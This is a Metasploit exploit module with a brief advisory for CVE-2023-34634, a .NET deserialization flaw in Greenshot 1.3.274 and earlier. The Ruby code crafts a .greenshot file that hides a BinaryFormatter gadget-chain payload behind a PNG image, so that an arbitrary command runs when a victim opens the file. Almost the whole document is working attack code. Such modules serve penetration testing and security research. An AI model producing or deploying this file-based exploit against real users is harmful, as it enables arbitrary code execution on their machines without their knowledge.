Authored by bwatters-r7, p4r4bellum | Site metasploit.com

There exists a .NET deserialization vulnerability in Greenshot versions 1.3.274 and below. The deserialization allows the execution of commands when a user opens a Greenshot file. The commands execute under the same permissions as the Greenshot service. Typically, it is the logged in user.

advisories | CVE-2023-34634

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Post::File

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',
'Description' => %q{
There exists a .NET deserialization vulnerability in Greenshot version 1.3.274
and below. The deserialization allows the execution of commands when a user opens
a Greenshot file. The commands execute under the same permissions as the Greenshot
service. Typically, is the logged in user.
},
'DisclosureDate' => '2023-07-26',
'Author' => [
'p4r4bellum', # Discovery
'bwatters-r7', # msf exploit
],
'References' => [
['CVE', '2023-34634'],
['EDB', '51633']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Windows', {} ],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
}
)
)

register_options([
OptPath.new('PNG_FILE', [false, 'PNG file to use'])
])
end

def exploit
if datastore['PNG_FILE'].blank?
image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
else
image_file = datastore['PNG_FILE']
end

datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?
if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'
datastore['FILENAME'] << '.greenshot'
end
cmd = payload.encoded

image_data = File.binread(image_file)

deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :WindowsIdentity,
formatter: :BinaryFormatter
)

payload_length = deserialize_cmd.length
outfile = image_data
outfile << deserialize_cmd
outfile << [payload_length].pack('Q')
outfile << 'Greenshot01.02'
file_create(outfile)
end
end